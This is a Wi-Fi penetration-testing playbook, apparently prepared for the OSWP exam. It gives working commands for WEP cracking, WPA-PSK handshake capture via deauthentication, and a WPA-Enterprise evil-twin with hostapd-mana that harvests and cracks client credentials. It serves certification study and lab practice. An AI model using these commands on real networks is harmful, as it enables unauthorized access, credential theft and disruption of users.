OSWP PlayBook V2

Abdulrahman & Zeyad Azima

Table of Contents

1. Reconnaissance................................................................... 2
1.1 Setup Interfaces ................................................................... 2
1.2 Monitor Networks ...................................................................2
1.3 Discover Hidden Networks ...................................................................3
 1.4 Change Channel ...................................................................3
1.5 Change MAC Address ...................................................................3
2. Connecting to Networks ................................................................... 3
2.1 Open Networks ................................................................... 3-4
2.3 WPA Networks ................................................................... 4
2.5 WPA-Enterprise Network ................................................................... 4-5
2.6 WEP Network ................................................................... 5
3. Attacking Networks...................................................................5
3.1 Cracking WEP Networks...................................................................5-7
3.2 Cracking WPA-PSK Networks...................................................................7-10
3.3 Cracking WPA-Enterprise...................................................................10-20

4. Install Required Tools & Packages...................................................................20

4.1 FreeRADIUS...................................................................20
4.2 Hostapd-Mana...................................................................20
4.3 Aircrack-ng...................................................................20
4.4 Asleap...................................................................20
4.5 Hashcat...................................................................20
4.6 John the Ripper...................................................................20
5. Resources & Labs...................................................................21
5.1 Resources...................................................................21
5.2 Labs...................................................................21

6. Contact & Follow Us...................................................................21

Follow The PlayBook Updates

https://github.com/abdoibrahim1337/OSWP-PlayBook
https://zeyadazima.com/notes/oswplaybook/

1. Reconnaissance

1.1 Setup Interfaces

Set Interface to monitor mode

sudo airmon-ng check kill && sudo airmon-ng start <interface>

Set Interface to managed mode

sudo airmon-ng stop <interface>

1.2 Monitor Networks

Monitor Networks
sudo airodump-ng --band abg --manufacturer <interface_in_mointor_mode>

Monitor Networks including WPS

sudo airodump-ng --band abg --manufacturer --wps <interface_in_mointor_mode>

Monitor Specific Network / BSSID

sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel>

<interface_in_mointor_mode>

1.3 Discover Hidden Networks

Get hidden Network ESSID using BSSID

sudo airodump-ng --band abg --bssid <mac> wlan0mon

Get hidden Network w/ Bruteforcing

mdk4 wlan0mon p -t <BSSID> -f <wordlist>

1.4 Change Channel

The interface has to be in monitor mode:

sudo iwconfig <interface_in_mointor_mode> channel <number>

1.5 Change MAC Address

1. Stop network manager

systemctl stop network-manager

2. Stop Interface
ip link set wlan0 down

3. Change the MAC address

macchanger -m <new_mac_address> <interface>

4. Start Interface
ip link set wlan0 up

Tips

If not succeed in this case may

1. interface name is wrong

2. your interface in monitor mode
In second case to fix it set it to managed mode:
sudo airmon-ng stop <int>
2. Connecting to Networks

2.1 Connect to Open Network

open.conf

network={
ssid="Open_Network_Name"
key_mgmt=NONE
}

Set ssid to the network name you want to connect to. Then, Save it to open.conf and connect
using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

2.2 Connect to WPA(1/2/3) Networks

WPA

network={
ssid="SSID"
psk="password"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}

for the proto set it to the WPA(version) :

WPA

WPA2

WPA3

Set ssid to the network name you want to connect to. Then, Save it to wpa.conf and connect using
the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

2.3 Connect to WPA Enterprise

network={
ssid="SSID"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="identity\user"
password="password"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}

set identity to the username, and password to the password.

Set ssid to the network name you want to connect to. Then, Save it to wpa_entp.conf and connect
using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

2.4 Connect to WEP Network

network={
ssid="SSID"
key_mgmt=NONE
wep_key0=""
wep_tx_keyidx=0
}

Note : Password(wep_key0) in WEP should be lowercase if hex and without ""

Capital also works in hex password

Set ssid to the network name you want to connect to. Then, Save it to wep.conf and connect using
the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

3. Attacking Networks
3.1 Cracking WEP Networks

1. Capture packets with the WEP network info

sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel>

wlan0mon

2. Send fake authentication

sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

Note: The interface mac address you can use anything also you if you would like to spoof one

3. ARPreplay Attack

sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address>

<interface_in_mointor_mode>
4. Crack password

sudo aircrack-ng wep-01.cap

3.2 Cracking WPA-PSK Networks

1. Gathering information of the target network like the Channel , BSSID

sudo airodump-ng --band abg <interface_in_mointor_mode>

 The above network type is WPA1 as there is no version appered

2. Capture Handshake

sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w

<pcap_file_name>

3. Perform De-authentication attack (kick a spasific client from the network to get the handshake)

sudo aireplay-ng -0 5 -c <client-mac> -a <BSSID>

<interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)

4. Wait till get the handshake

5. After getting EAPOL ( Handshake), We will crack the password using aircrack-ng

sudo aircrack-ng -w <wordlist> capfile.cap

Connect to the network using connecting to networks section

3.3 Cracking WPA-Enterprise

1. First, We gather information about the network like BSSID , channel to filter the networks using:

sudo airodump-ng --band abg <interface_in_mointor_mode>

2. Then we gather handshake for the enterprise network

sudo airodump-ng --band abg -c x --bssid <BSSID> -w <pcap_file_name>

<interface_in_mointor_mode>

3. After that we look at clients of the network and try to De-authenticate a client to get PMKID for the
network:

sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_mointor_mode>

Then we wait till we get handshake, In some cases we can wait client to connect.
4. After we get it we go through cap file and extract the IDENTITY USER

5. Extract the Certificate

 Note: Save the cert in der as the following

6. We also display information of certificate using this command

openssl x509 -inform der -in CERTIFICATE_FILENAME -text

7. Fake the network using freeradius
We go to /etc/freeradius/3.0/certs path, Then we change the following 2 files with
information we obtained from the certificate:

nano ca.cnf

nano server.cnf
 9. After that we do the following commands under /etc/freeradius/3.0/certs to generate
Diffie Hellman key for hostapd-mana

rm dh
make

You may encounter error as the following, You can ignore it

10 . We create EAP user filename mana.eap_user

* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2
"pass" [2]
11. After that we create a fake access point by creating a file called network.conf under any other
directory

12. We paste the following configurations in the file and modify it to our needs:

ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh

auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP

wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
13. Turn the interface to managed mode again
14. Then use the following command to create fake AP

sudo hostapd-mana <file.conf>

15. Perform De-authentication attack (kick a spasific client from the network to get the handshake),
Using another interface:

sudo aireplay-ng -0 0 -c <client-mac> -a <BSSID>

<interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)

You need to use another interface in monitor mode, Also you need to set the interface to the
same channel as the target network before performing the De-authenticate attack, As the
following:
 Tip: If there are 2 Enterprise network with the same name, You need to perform the De-
authenticate attack on both of the networks.

16. then once you get handshake you will copy and paste command of asleep and adding -W
/path/to/wordlist

asleap -C do:3b:8d:7b:22:00:0:91 -R
68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W
/usr/share/john/password.lst

Note: if it doesn't work with you can get the hash of the Hashcat tool and put it in file called
hashfile and use this command to crack it
hashcat -a 0 -m 5500 hashfile rockyou.txt --force
17. After getting username and password here you go for connecting to the network section.

4. Install Required Tools & Packages:

4.1 FreeRADIUS

sudo apt update

sudo apt install freeradius freeradius-utils

4.2 Hostapd-Mana

sudo apt update

sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd
make
sudo make install

4.3 Aircrack-ng

sudo apt update

sudo apt install aircrack-ng

4.4 Asleap

sudo apt update

sudo apt install asleap
4.5 Hashcat

sudo apt update

sudo apt install hashcat

4.6 John the Ripper

sudo apt update

sudo apt install john

5. Resources & Labs

5.1 Resources

https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet
https://github.com/drewlong/oswp_notes

https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/

5.2 Labs and Linux Dist

Labs 5.2.1

https://wifichallengelab.com
https://github.com/r4ulcl/WiFiChallengeLab-docker

Note: For this lab you won't need any physical cards or anything all performed through, The
labs virtual machine include everything, shoutout for r4ulcl for this amazing lab.

5.2.2 Linux Dist

https://www.wifislax.com: Wireless Pentest OS

6. Contact & Follow Us

Github Abdulrahman Zeyad

Linkedin Abdulrahman Zeyad

Twitter/X Abdulrahman Zeyad

Website Zeyad

Email 0xexploiteagle@gmail.com contact@zeyadazima.com